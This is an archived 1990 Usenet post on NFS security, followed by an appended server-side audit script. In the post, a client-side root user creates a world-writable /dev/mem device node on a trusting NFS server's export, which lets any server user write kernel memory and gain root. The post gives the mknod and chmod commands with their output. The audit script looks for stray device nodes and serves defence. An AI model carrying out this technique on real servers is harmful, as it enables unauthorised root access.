Xref: utzoo comp.unix.internals:1564 alt.security:1805
Path: utzoo!utgpu!cs.utexas.edu!sun-barr!newstop!texsun!convex!news
From: tchrist@convex.COM (Tom Christiansen)
Newsgroups: comp.unix.internals,alt.security
Subject: Re: becoming root via NFS
Message-ID: <1990Dec19.180541.7693@convex.com>
Date: 19 Dec 90 18:05:41 GMT
References: <4088@osc.COM> <111544@convex.convex.com> <114827@uunet.UU.NET>
Sender: news@convex.com (news access account)
Reply-To: tchrist@convex.COM (Tom Christiansen)
Organization: CONVEX Software Development, Richardson, TX
Lines: 65
Nntp-Posting-Host: pixel.convex.com

[ I've gotten nothing but confused and disbelieving mail on this, so
  apparently I did not adequately describe the scenario. ]

From the keyboard of rbj@uunet.UU.NET (Root Boy Jim):
:In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.

Says who?  This isn't so.  I'm on my workstation.  I'm the superuser.
I've got the trusting server's filesystem mounted on my system.  (It's
a diskless 350, so I have to have something.)  I can certainly do the
mknod.  Watch (I'm root@cthulhu, my workstation):

cthulhu# df .
Filesystem                    kbytes    used   avail capacity  Mounted on
globhost:/usr/spool/globdata  371967  280812   53958    84%    /rmt/globhost/globdata

[ ``globhost'' is another Sun, but this works with non-Sun NFS systems
  as well. ]

cthulhu# ls -lgd .
drwxrwxrwt 43 root     bin          4096 Dec 19 11:52 ./

[ Even if it weren't world-write, I could become the owner and make a
  world-write subdir. ]

cthulhu# ls -lg /dev/mem
crw-r-----  1 root     kmem       3,   0 May 29  1990 /dev/mem
cthulhu# mknod mymem c 3 0

[ I actually have to choose the right major/minor number for the server,
  not the client, if it's his kernel I wish to crack. ]

cthulhu# ls -l mymem
crw-r--r--  1 -2           3,   0 Dec 19 11:49 mymem

[ See, I made it fine, and it's owned by "nobody". ]

cthulhu# chmod 666 mymem
cthulhu# ls -l mymem
crw-rw-rw-  1 -2           3,   0 Dec 19 11:58 mymem

Now, go over to the server and you can write his kernel as a normal
user.  I've already demo'd how to use adb to punch your shell's uid to
0, although you should get the cred structure, too.  You could also
make a nice disk device and read things if you want.

--tom
-- 
Tom Christiansen          tchrist@convex.com          convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
 to look at yourself in the mirror the next morning."  -me
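A server-side audit for the condition the post demonstrates, added here as an example that is not part of the original post or of any vendor's tooling: it walks an exported tree for character or block special files outside /dev (none belong there) and marks those whose major,minor pair matches the server's memory devices. The names flag_devnodes, scan_export and SENSITIVE_DEVS are assumptions; "3,0" is the /dev/mem number the post shows and "3,1" is assumed for /dev/kmem, so replace both with the numbers from your own server's /dev.

```sh
#!/bin/sh
# Added example: audit an NFS-exported tree on the SERVER for stray device nodes.
# flag_devnodes, scan_export and SENSITIVE_DEVS are assumed names, not from the post.

# major,minor pairs as the SERVER kernel numbers them.  "3,0" is the /dev/mem
# number shown in the post; "3,1" is assumed for /dev/kmem.  Replace with the
# real numbers from "ls -l /dev/mem /dev/kmem" on your server.
SENSITIVE_DEVS="3,0 3,1"

# flag_devnodes: read "ls -l"-style lines on stdin; print every character or
# block special file, prefixed with "!!" when its major,minor is sensitive.
flag_devnodes() {
    awk -v list="$SENSITIVE_DEVS" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        /^[cb]/ {
            # device entries show "major, minor" where a plain file shows its size
            if (match($0, /[0-9]+, +[0-9]+/)) {
                pair = substr($0, RSTART, RLENGTH)
                gsub(/, +/, ",", pair)
                if (pair in bad) print "!! " $0; else print "   " $0
            }
        }'
}

# scan_export: walk one exported filesystem (-xdev stays on it), skipping the
# real /dev, and pass any device nodes found through flag_devnodes.
scan_export() {
    find "$1" -xdev \( -type c -o -type b \) ! -path "$1/dev/*" \
        -exec ls -l {} + 2>/dev/null | flag_devnodes
}

# Usage: sh audit_export.sh /usr/spool/globdata   (run as root on the server)
if [ "$#" -gt 0 ]; then
    scan_export "$1"
fi
```

Lines marked "!!" are nodes that would let any local user on the server open kernel memory; an empty report is the expected state for an exported tree.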